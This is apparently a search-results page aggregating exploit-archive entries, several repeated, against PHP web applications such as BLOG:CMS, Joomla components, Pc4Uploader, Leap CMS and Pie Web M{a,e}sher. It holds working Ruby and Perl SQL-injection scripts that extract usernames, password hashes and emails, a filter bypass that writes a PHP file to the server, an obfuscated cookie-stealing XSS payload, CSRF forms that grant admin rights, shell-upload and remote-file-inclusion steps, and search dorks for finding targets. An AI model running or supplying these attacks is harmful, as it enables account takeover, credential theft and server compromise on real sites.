ftp password hacking
Search result for 'ftp password hacking'
(0.0343399047852 seconds)
High-Tech Bridge ./BLOG:CMS <= v4.2.1e Multiple Vulnerabilities ( php)
Vulnerability ID: HTB22727
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_blogcms.html
Product: BLOG:CMS
Vendor: Radek Hulán ( http://blogcms.com/ )
Vulnerable Version: 4.2.1.e and probably prior versions
Vendor Notification: 30 November 2010
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
XSRF/CSRF:
Vulnerability Details:
The vulnerability exists due to failure in the "admin/libs/ADMIN.php" script to properly verify the source of HTTP request.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
Attacker can use browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/admin/index.php" method="post" name="main">
<input type="hidden" name="action" value="changemembersettings">
<input type="hidden" name="memberid" value="USER_UD">
<input type="hidden" name="name" value="tester">
<input type="hidden" name="realname" value="tester">
<input type="hidden" name="password" value="">
<input type="hidden" name="repeatpassword" value="">
<input type="hidden" name="email" value="email@example.com">
<input type="hidden" name="url" value="">
<input type="hidden" name="admin" value="1">
<input type="hidden" name="canlogin" value="1">
<input type="hidden" name="notes" value="">
<input type="hidden" name="deflang" value="">
</form>
<script>
document.main.submit();
</script>
Stored XSS (HTB22724):
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "action.php" script to properly sanitize user-supplied input in "body" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. Enter comment like <script>alert('XSS')</script> in "Add new comment" form.
XSS (HTB22725):
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "admin/index.php" script to properly sanitize user-supplied input in "amount" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/admin/index.php" method="post" name="main">
<input type="hidden" name="blogid" value="0">
<input type="hidden" name="itemid" value="0">
<input type="hidden" name="action" value="browseowncomments">
<input type="hidden" name="amount" value='10"><script>alert(document.cookie)</script>'>
<input type="hidden" name="start" value="0">
<input type="hidden" name="search" value="">
</form>
<script>
document.main.submit();
</script>
Solution: Upgrade to the most recent version
XSS(HTB22726):
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "admin/index.php" script to properly sanitize user-supplied input in "action" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is available:
http://host/admin/index.php?action=settingsedit"><script>alert(document.cookie)</script>
Solution: Upgrade to the most recent version
Easy Laster/Joomla JE Job Component SQL injection Vulnerability ( php)
----------------------------Information------------------------------------------------
+Name : joomla JE Job Component <= SQL injection Vulnerability Exploit
+Autor : Easy Laster
+Date : 30.09.2010
+Script : joomla JE Job Component
+Demo : http://joomlaextensions.co.in/jobcomponent/
+Download : http://joomlaextensions.co.in/extensions/modules/je-content-menu.html
?page=shop.product_details&category_id=4&flypage=flypage.tpl&product_id=59&vmcchk=1
+Price : free
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents and free-hack.com
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco,
---------------------------------------------------------------------------------------
___ ___ ___ ___ _ _ _____ _ _
| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_
|_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _|
|_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_|
|___| |___|
----------------------------------------------------------------------------------------
#!/usr/bin/ruby
#4004-security-project.com
#Discovered and vulnerability by Easy Laster
print "
#########################################################
# 4004-Security-Project #
#########################################################
# joomla JE Job Component #
# Exploit #
# Using Host+Path+id #
# www.demo.de /forum/ 1 #
# Easy Laster #
#########################################################
"
require 'net/http'
print "#########################################################"
print "\nEnter host name (site.com)->"
host=gets.chomp
print "#########################################################"
print "\nEnter script path (/forum/)->"
path=gets.chomp
print "\n#########################################################"
print "\nEnter the id (id)->"
userid=gets.chomp
print "#########################################################"
begin
dir = "index.php?option=com_jejob&view=item_detail"+
"&itemid=1+and+1=0+uNiOn+sElEcT+1,concat(0x23,0x23,"+
"0x23,0x23,0x23,id,0x23,0x23,0x23,0x23,0x23),3,4,5,"+
"6,7,8,9,10,11,12,13+from+jos_users+where+id="+ userid +"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nid -> "+(/#####(.+)#####/).match(resp.body)[1]
dir = "index.php?option=com_jejob&view=item_detail&"+
"itemid=1+and+1=0+uNiOn+sElEcT+1,concat(0x23,0x23,0x23"+
",0x23,0x23,username,0x23,0x23,0x23,0x23,0x23),3,4,5,"+
"6,7,8,9,10,11,12,13+from+jos_users+where+id="+ userid +"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nUsername -> "+(/#####(.+)#####/).match(resp.body)[1]
dir = "index.php?option=com_jejob&view=item_detail&itemid"+
"=1+and+1=0+uNiOn+sElEcT+1,concat(0x23,0x23,0x23,0x23,0x23"+
",password,0x23,0x23,0x23,0x23,0x23),3,4,5,6,7,8,9,10,11,12"+
",13+from+jos_users+where+id="+ userid +"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nEPassword -> "+(/#####(.+)#####/).match(resp.body)[1]
dir = "index.php?option=com_jejob&view=item_detail&itemid=1+and+1=0"+
"+uNiOn+sElEcT+1,concat(0x23,0x23,0x23,0x23,0x23,email,0x23,0x23,0x23"+
",0x23,0x23),3,4,5,6,7,8,9,10,11,12,13+from+jos_users+where+id="+ userid +"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nEmail -> "+(/#####(.+)#####/).match(resp.body)[1]
print "\n#########################################################"
rescue
print "\nExploit failed"
end
Qabandi/Pc4Uploader 9.0 Remote Blind SQL Injection Vulnerability ( php)
|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_w_,
( : / (_) / ( .
=By: Qabandi
=Email: iqa[a]hotmail.fr
From Kuwait PEACE
=Vuln: pc4arb - pc4 Uploader <= 9.0 Blind SQL injection
=INFO: http://pc4arb.com/product-13.html
=BUY: http://pc4arb.com/deal-13.html
=DORK: intext:"Powered by Pc4Uploader v9.0"
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@-SQL-Filter-Bypass@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
----------Vulnerable code@ "./code.php"----------------------------------------
function filter_sql( $inputsql )
{
$regsql = "(delete)|(update)|(union)|(insert)";
return eregi_replace( $regsql, "", $inputsql );
}
------------------END----------------------------------------------------------
-=-===--=-=-==-=-==-=-=-=-=-=-=-=-POC-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
$Q = "UNIunionON";
filter_sql($Q);
echo $Q;
--
Result = UNION
We can use this to upload a file, using the "dumpfile" and "outfile" Mysql functions.
POC:-
conditions: magic_quotes_gpc = off // 0777 chmoded folder // location of folder.
To get location in server, we can generate an error using the STYLE cookie handler, to do this we need to set tempst=qabandi.
javascript:document.cookie="tempst=qabandi";
Refresh,
you will get the following:
Warning: file(templates/Qabandi/main_block.html) [function.file]: failed to open stream: No such file or directory in /home/XXXXXXX/public_html/function.php on line 33
now we have the location in server, "/home/XXXXXXX/public_html/"
"/home/XXXXXXX/public_html/upfiles/" <--- 99% of the time its chmoded 0777.
now the exploit:
http://localhost/pc4up/code.php?load=banner&id=-1 UNunionION select 1,2,3,'<? include($Q);?>',5,6,7,8,9 into outfile '/home/XXXXXXX/public_html/upfiles/qabandi.php'
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@-BLIND SQL@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
----------Vulnerable code@ "./code.php"-----------------------------------------
if ( $_GET['load'] == "banner" )
{
$idx = $_GET['id'];
$idx = strip_tags( $idx );
$idx = filter_sql( $idx );/// <------ SIMPLY bypassed by using "unUNIONion" ;)
if ( !( $query_banner = mysql_query( "SELECT * FROM banners WHERE id={$idx}" ) ) )
{
exit( "Query failed" );
}
$x = mysql_fetch_row( $query_banner );
$url = $x[2];
$visits = $x[5];
if ( !( $query = mysql_query( "UPDATE banners SET visits=visits+1 WHERE id ={$idx}" ) ) )
{
exit( "Query failed" );
}
header( "Location: {$url}" );
}
--------------:PoC:-------------
conditions: admin must have added a banner using the "add banner" feature. the banner ID must be valid.
Blind SQL DEMO:-
http://upload.traidnt.net/code.php?load=banner&id=1 and substring(@@version,1,1)=4 <-- TRUE! (MySQL version 4)
http://upload.traidnt.net/code.php?load=banner&id=1 and substring(@@version,1,1)=5 <-- BLANK
To get info:
http://upload.traidnt.net/code.php?load=banner&id=1 and ascii(substring((SELECT concat(username,char(62),password) from admin limit 0,1),1,1))>95
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-==-=LA tsta3mloha 3la elmowaqi3 el islamiya=-=-=-=-=-=-=-=-
=-=-=-=-==-=-=-=-=-=-No-More---Private=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Salamz: Killer Hack, Mr.Mn7os, Ghost-r00t, All muslim hackers.
# milw0rm.com [2009-05-18]
YEnH4ckEr/Leap CMS 0.1.4 (SQL/XSS/SU) Multiple Remote Vulnerabilities ( php)
***********************************************************************************************
***********************************************************************************************
** **
** **
** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] **
** || || || [] [][] [] [] [] [] [] [] [] [] [] [] **
** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] **
** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\
**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>--
** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/
[> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] **
** **
** **
** ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O **
** ¡PROUD TO BE SPANISH! **
** **
***********************************************************************************************
***********************************************************************************************
----------------------------------------------------------------------------------------------
| MULTIPLE REMOTE VULNERABILITIES |
|--------------------------------------------------------------------------------------------|
| | LEAP CMS 0.1.4 | |
| CMS INFORMATION: ------------------------------ |
| |
|-->WEB: http://leap.gowondesigns.com/ |
|-->DOWNLOAD: http://leap.gowondesigns.com/download.php?leap014.zip |
|-->DEMO: http://php.opensourcecms.com/scripts/details.php?scriptid=161&name=Leap |
|-->CATEGORY: CMS / Lite |
|-->DESCRIPTION: Leap is a single file, template independent, open-source, |
| standards-compliant,extensible content management system for the web... |
|-->RELEASED: 2009-03-13 |
| |
| CMS VULNERABILITY: |
| |
|-->TESTED ON: firefox 3 and I-Explorer 6 |
|-->DORK: "Powered by Leap" |
|-->CATEGORY: AUTH-BYPASS(SQLi)/COOKIE-STEALER (XSS)/SHELL-UPLOAD/ XSS |
|-->AFFECT VERSION: 0.1.4 (maybe <= ?) |
|-->Discovered Bug date: 2009-04-24 |
|-->Reported Bug date: 2009-04-24 |
|-->Fixed bug date: Not fixed |
|-->Info patch: Not fixed |
|-->Author: YEnH4ckEr |
|-->mail: y3nh4ck3r[at]gmail[dot]com |
|-->WEB/BLOG: N/A |
|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. |
|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) |
----------------------------------------------------------------------------------------------
##############################
//////////////////////////////
AUTHENTICATION BYPASS (SQLi):
/////////////////////////////
##############################
<<<<---------++++++++++++++ Condition: magic_quotes_gpc=off +++++++++++++++++--------->>>>
-----------
FILE VULN:
-----------
Path --> [HOME_PATH]/leap.php
function checkSession() {
if($_POST['login']=='Login') {
$_SESSION['userMail']=$_POST['email']; $_SESSION['passWord']=md5($_POST['pwd']);
....
}
$i=@mysql_query("SELECT * FROM ".db('prefix')."users WHERE mail='$_SESSION[userMail]' AND pwd='$_SESSION[passWord]'"); $d=@mysql_fetch_array($i);
....
---------
EXPLOIT:
---------
Email Address: nothing' or 1=1#
Password: nothing
#############################
/////////////////////////////
COOKIES STEALING VULN (XSS):
/////////////////////////////
#############################
<<<<---------++++++++++++++ Condition: Add comment +++++++++++++++++--------->>>>
---------
EXPLOIT:
---------
Go to Link --> http://[HOST]/[HOME_PATH]/?article.[ARTICLE_TITLE]
There it can comment the article.
Add a comment with any name/email and message:
<script>document.location=String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,101,120,112,108,111,105,116,45,99,111,111,107,105,101,115,47,119,97,105,116,105,110,103,45,102,111,114,46,112,104,112,63,99,107,61)+document.cookie</script>
PHP Script (Cookies Stealer) --> See: http://www.milw0rm.com/exploits/8453
http://www.milw0rm.com/exploits/8471
Note: Exploit fails if real admin click on log-out button.
############################
////////////////////////////
SHELL UPLOAD VULNERABILITY:
////////////////////////////
############################
<<<<---------++++++++++++++ Condition: Be superadmin (above) +++++++++++++++++--------->>>>
---------
EXPLOIT:
---------
Option: Manage Files. Link --> http://[HOST]/[HOME_PATH]/?admin.system.files
upload your shell there.
Then, Go to the link --> http://[HOST]/[HOME_PATH]/shell.php
########################
////////////////////////
XSS (SEARCH POST FORM):
////////////////////////
########################
Search:
"><script>alert(1)</script>
<<<-----------------------------EOF---------------------------------->>>ENJOY IT!
#######################################################################
#######################################################################
##*******************************************************************##
## ESPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: JosS and all SPANISH Hack3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################
# milw0rm.com [2009-04-30]
NoGe/Pie Web M{a,e}sher 0.5.3 Multiple Remote File Inclusion Vulnerability ( php)
===========================================================================================
[o] Pie Web M{a,e}sher 0.5.3 Multiple Remote File Inclusion Vulnerability
Software : Pie Web M{a,e}sher version 0.5.3
Vendor : http://pie.ekkaia.org/
Download : http://pie.ekkaia.org/page/Download
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com
===========================================================================================
[o] Vulnerable file
all file below is affected by "lib" parameter
lib/action/alias.php
lib/action/cancel.php
lib/action/context.php
lib/action/deadlinks.php
lib/action/delete.php
lib/action/diff.php
lib/action/download.php
lib/action/dump.php
lib/action/edit.php
lib/action/fileimport.php
lib/action/fileinfo.php
lib/action/filelist.php
lib/action/goto.php
lib/action/history.php
lib/action/image.php
lib/action/latest.php
lib/action/links.php
lib/action/logflush.php
lib/action/login.php
lib/action/logout.php
lib/action/logshow.php
lib/action/maintenance.php
lib/action/page.php
lib/action/pageimport.php
lib/action/pageinfo.php
lib/action/pagelist.php
lib/action/password.php
lib/action/preview.php
lib/action/purge.php
lib/action/referers.php
lib/action/register.php
lib/action/rename.php
lib/action/revert.php
lib/action/rss.php
lib/action/search.php
lib/action/show.php
lib/action/source.php
lib/action/systeminfo.php
lib/action/update.php
lib/action/upgrade.php
lib/action/upload.php
lib/action/useradd.php
lib/action/userdel.php
lib/action/useredit.php
lib/action/userimport.php
lib/action/userinfo.php
lib/action/userlist.php
lib/action/version.php
lib/action/wipe.php
all file below is affected by "GLOBALS[pie][library_path]" parameter
lib/class/diff.php
lib/class/file.php
lib/class/locale.php
lib/class/mapfile.php
lib/class/page.php
lib/class/user.php
lib/class/userpref.php
lib/compiler/html.php
lib/share/auth.php
lib/share/errorimage.php
lib/share/link.php
lib/share/log.php
lib/share/private.php
lib/share/referers.php
[o] Exploit
http://localhost/[path]/lib/action/alias.php?lib=[evilcode]
http://localhost/[path]/lib/class/diff.php?GLOBALS[pie][library_path]=[evilcode]
http://localhost/[path]/libcompiler/html.php?GLOBALS[pie][library_path]=[evilcode]
http://localhost/[path]/lib/share/auth.php?GLOBALS[pie][library_path]=[evilcode]
===========================================================================================
[o] Greetz
MainHack BrotherHood [ http://serverisdown.org/blog/]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
H312Y yooogy mousekill }^-^{ kaka11 martfella
skulmatic olibekas ulga Cungkee k1tk4t str0ke
GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]
===========================================================================================
# milw0rm.com [2008-11-24]
High-Tech Bridge SA/BLOG:CMS 4.2.1e Cross Site Request Forgery / Cross Site Scripting ( na)
Vulnerability ID: HTB22727
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_blogcms.html
Product: BLOG:CMS
Vendor: Radek Hulán ( http://blogcms.com/ )
Vulnerable Version: 4.2.1.e and probably prior versions
Vendor Notification: 30 November 2010
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
XSRF/CSRF:
Vulnerability Details:
The vulnerability exists due to failure in the "admin/libs/ADMIN.php" script to properly verify the source of HTTP request.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
Attacker can use browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/admin/index.php" method="post" name="main">
<input type="hidden" name="action" value="changemembersettings">
<input type="hidden" name="memberid" value="USER_UD">
<input type="hidden" name="name" value="tester">
<input type="hidden" name="realname" value="tester">
<input type="hidden" name="password" value="">
<input type="hidden" name="repeatpassword" value="">
<input type="hidden" name="email" value="email@example.com">
<input type="hidden" name="url" value="">
<input type="hidden" name="admin" value="1">
<input type="hidden" name="canlogin" value="1">
<input type="hidden" name="notes" value="">
<input type="hidden" name="deflang" value="">
</form>
<script>
document.main.submit();
</script>
Stored XSS (HTB22724):
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "action.php" script to properly sanitize user-supplied input in "body" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. Enter comment like <script>alert('XSS')</script> in "Add new comment" form.
XSS (HTB22725):
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "admin/index.php" script to properly sanitize user-supplied input in "amount" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/admin/index.php" method="post" name="main">
<input type="hidden" name="blogid" value="0">
<input type="hidden" name="itemid" value="0">
<input type="hidden" name="action" value="browseowncomments">
<input type="hidden" name="amount" value='10"><script>alert(document.cookie)</script>'>
<input type="hidden" name="start" value="0">
<input type="hidden" name="search" value="">
</form>
<script>
document.main.submit();
</script>
Solution: Upgrade to the most recent version
XSS(HTB22726):
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "admin/index.php" script to properly sanitize user-supplied input in "action" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is available:
http://host/admin/index.php?action=settingsedit"><script>alert(document.cookie)</script>
Solution: Upgrade to the most recent version
BLOG:CMS versions 4.2.1e and below suffer from cross site request forgery and cross site scripting vulnerabilities.
Don Tukulesto/Joomla Recerca SQL Injection ( na)
#!/usr/bin/perl
#=========================== [ root@indonesiancoder.com $ ~] ===========================#
# [~] Joomla Components com_recerca (ansubdepartments_id) SQL Injection Vulneralbility #
# [~] Author : Don Tukulesto #
# [~] Homepage : http://www.indonesiancoder.com #
# [~] Tune in : http://www.AntiSecradio.fm ( choose your weapon ) #
# [~] Gracias : IndonesianCoder.com - AntiSecurity.org - ServerIsDown.org - MainHack #
# [~] kaMtiEz, M3NW5, arianom, Jack-, Yadoy666, Gonzhack, SoulNet, s4va, tiw0L, Kill-9 #
# [~] SAINT, CYB3R_TR0N, M364TR0N, NoGe, TUCKER, Ian Petrucii, RoNz, Chercut, YOU !! #
#=========================== [ root@indonesiancoder.com $ ~] ===========================#
use HTTP::Request;
use LWP::UserAgent;
$cmsapp = 'Joomla Component com_recerca';
$vuln = 'index.php?option=com_recerca&task=linia&ansubdepartments_id=';
$column = 'concat(username,0x3a,password)tukulesto';
$table = 'jos_users';
$regexp = 'No elements defined';
$maxlen = 65;
my $OS = "$^O";
if ($OS eq 'MSWin32') { system("cls"); } else { system("clear"); }
printf "\n
$cmsapp
[x]====================================================[x]
| www[dot]IndonesianCoder[dot]com |
[x]====================================================[x]
\n";
print " [~] URL Path : "; chomp($web=<STDIN>);
print " [~] Valid ID : "; chomp($id=<STDIN>);
print " [~] Column : "; chomp($columns=<STDIN>);
if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; }
print "\n\n [!] Exploiting $target ...\n\n";
&get_data;
print "\n\n [!] Exploit completed.\n\n";
sub get_data() {
@columns = split(/,/, $columns);
foreach $column (@columns) {
print " [exploiting\@$web] SELECT $column FROM $table please wait...\n";
syswrite(STDOUT, " [exploiting\@$web] $column\@$table > ", 255);
for (my $i=1; $i<=$maxlen; $i++) {
my $chr = 0;
my $found = 1;
my $char = 48;
while (!$chr && $char<=90) {
if(exploit($i,$char) !~ /$regexp/) {
$chr = 1;
$found = 1;
syswrite(STDOUT,chr($char),1);
} else { $found = 0; }
$char++;
}
if(!$chr) {
$char = 97;
while(!$chr && $char<=122) {
if(exploit($i,$char) !~ /$regexp/) {
$chr = 1;
$found = 1;
syswrite(STDOUT,chr($char),1);
} else { $found = 0; }
$char++;
}
}
if (!$found) {
print "\n"; last;
}
}
}
}
sub exploit() {
my $limit = $_[0];
my $chars = $_[1];
my $shits = '+union+select+1,2,3,'.$column.',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+'.$table.'--';
my $inject = $target.$vuln.$id.$shits;
my $content = get_content($inject);
return $content;
}
sub get_content() {
my $url = $_[0];
my $req = HTTP::Request->new(GET => $url);
my $ua = LWP::UserAgent->new();
$ua->timeout(15);
my $res = $ua->request($req);
if ($res->is_error){
print "\n\n [!] Error, ".$res->status_line.".\n\n";
exit;
}
return $res->content;
}
The Joomla Recerca component suffers from a remote SQL injection vulnerability.
YEnH4ckEr/Leap CMS 0.1.4 XSS / SQL Injection ( na)
***********************************************************************************************
***********************************************************************************************
** **
** **
** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] **
** || || || [] [][] [] [] [] [] [] [] [] [] [] [] **
** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] **
** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\
**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>--
** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/
[> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] **
** **
** **
** ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O **
** ¡PROUD TO BE SPANISH! **
** **
***********************************************************************************************
***********************************************************************************************
----------------------------------------------------------------------------------------------
| MULTIPLE REMOTE VULNERABILITIES |
|--------------------------------------------------------------------------------------------|
| | LEAP CMS 0.1.4 | |
| CMS INFORMATION: ------------------------------ |
| |
|-->WEB: http://leap.gowondesigns.com/ |
|-->DOWNLOAD: http://leap.gowondesigns.com/download.php?leap014.zip |
|-->DEMO: http://php.opensourcecms.com/scripts/details.php?scriptid=161&name=Leap |
|-->CATEGORY: CMS / Lite |
|-->DESCRIPTION: Leap is a single file, template independent, open-source, |
| standards-compliant,extensible content management system for the web... |
|-->RELEASED: 2009-03-13 |
| |
| CMS VULNERABILITY: |
| |
|-->TESTED ON: firefox 3 and I-Explorer 6 |
|-->DORK: "Powered by Leap" |
|-->CATEGORY: AUTH-BYPASS(SQLi)/COOKIE-STEALER (XSS)/SHELL-UPLOAD/ XSS |
|-->AFFECT VERSION: 0.1.4 (maybe <= ?) |
|-->Discovered Bug date: 2009-04-24 |
|-->Reported Bug date: 2009-04-24 |
|-->Fixed bug date: Not fixed |
|-->Info patch: Not fixed |
|-->Author: YEnH4ckEr |
|-->mail: y3nh4ck3r[at]gmail[dot]com |
|-->WEB/BLOG: N/A |
|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. |
|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) |
----------------------------------------------------------------------------------------------
##############################
//////////////////////////////
AUTHENTICATION BYPASS (SQLi):
/////////////////////////////
##############################
<<<<---------++++++++++++++ Condition: magic_quotes_gpc=off +++++++++++++++++--------->>>>
-----------
FILE VULN:
-----------
Path --> [HOME_PATH]/leap.php
function checkSession() {
if($_POST['login']=='Login') {
$_SESSION['userMail']=$_POST['email']; $_SESSION['passWord']=md5($_POST['pwd']);
....
}
$i=@mysql_query("SELECT * FROM ".db('prefix')."users WHERE mail='$_SESSION[userMail]' AND pwd='$_SESSION[passWord]'"); $d=@mysql_fetch_array($i);
....
---------
EXPLOIT:
---------
Email Address: nothing' or 1=1#
Password: nothing
#############################
/////////////////////////////
COOKIES STEALING VULN (XSS):
/////////////////////////////
#############################
<<<<---------++++++++++++++ Condition: Add comment +++++++++++++++++--------->>>>
---------
EXPLOIT:
---------
Go to Link --> http://[HOST]/[HOME_PATH]/?article.[ARTICLE_TITLE]
There it can comment the article.
Add a comment with any name/email and message:
<script>document.location=String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,101,120,112,108,111,105,116,45,99,111,111,107,105,101,115,47,119,97,105,116,105,110,103,45,102,111,114,46,112,104,112,63,99,107,61)+document.cookie</script>
PHP Script (Cookies Stealer) --> See: http://www.milw0rm.com/exploits/8453
http://www.milw0rm.com/exploits/8471
Note: Exploit fails if real admin click on log-out button.
############################
////////////////////////////
SHELL UPLOAD VULNERABILITY:
////////////////////////////
############################
<<<<---------++++++++++++++ Condition: Be superadmin (above) +++++++++++++++++--------->>>>
---------
EXPLOIT:
---------
Option: Manage Files. Link --> http://[HOST]/[HOME_PATH]/?admin.system.files
upload your shell there.
Then, Go to the link --> http://[HOST]/[HOME_PATH]/shell.php
########################
////////////////////////
XSS (SEARCH POST FORM):
////////////////////////
########################
Search:
"><script>alert(1)</script>
<<<-----------------------------EOF---------------------------------->>>ENJOY IT!
#######################################################################
#######################################################################
##*******************************************************************##
## ESPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: JosS and all SPANISH Hack3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################
Leap CMS version 0.1.4 suffers from cross site scripting, shell upload, and remote SQL injection vulnerabilities.
NoGe/pieweb-rfi.txt ( na)
===========================================================================================
[o] Pie Web M{a,e}sher 0.5.3 Multiple Remote File Inclusion Vulnerability
Software : Pie Web M{a,e}sher version 0.5.3
Vendor : http://pie.ekkaia.org/
Download : http://pie.ekkaia.org/page/Download
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com
===========================================================================================
[o] Vulnerable file
all file below is affected by "lib" parameter
lib/action/alias.php
lib/action/cancel.php
lib/action/context.php
lib/action/deadlinks.php
lib/action/delete.php
lib/action/diff.php
lib/action/download.php
lib/action/dump.php
lib/action/edit.php
lib/action/fileimport.php
lib/action/fileinfo.php
lib/action/filelist.php
lib/action/goto.php
lib/action/history.php
lib/action/image.php
lib/action/latest.php
lib/action/links.php
lib/action/logflush.php
lib/action/login.php
lib/action/logout.php
lib/action/logshow.php
lib/action/maintenance.php
lib/action/page.php
lib/action/pageimport.php
lib/action/pageinfo.php
lib/action/pagelist.php
lib/action/password.php
lib/action/preview.php
lib/action/purge.php
lib/action/referers.php
lib/action/register.php
lib/action/rename.php
lib/action/revert.php
lib/action/rss.php
lib/action/search.php
lib/action/show.php
lib/action/source.php
lib/action/systeminfo.php
lib/action/update.php
lib/action/upgrade.php
lib/action/upload.php
lib/action/useradd.php
lib/action/userdel.php
lib/action/useredit.php
lib/action/userimport.php
lib/action/userinfo.php
lib/action/userlist.php
lib/action/version.php
lib/action/wipe.php
all file below is affected by "GLOBALS[pie][library_path]" parameter
lib/class/diff.php
lib/class/file.php
lib/class/locale.php
lib/class/mapfile.php
lib/class/page.php
lib/class/user.php
lib/class/userpref.php
lib/compiler/html.php
lib/share/auth.php
lib/share/errorimage.php
lib/share/link.php
lib/share/log.php
lib/share/private.php
lib/share/referers.php
[o] Exploit
http://localhost/[path]/lib/action/alias.php?lib=[evilcode]
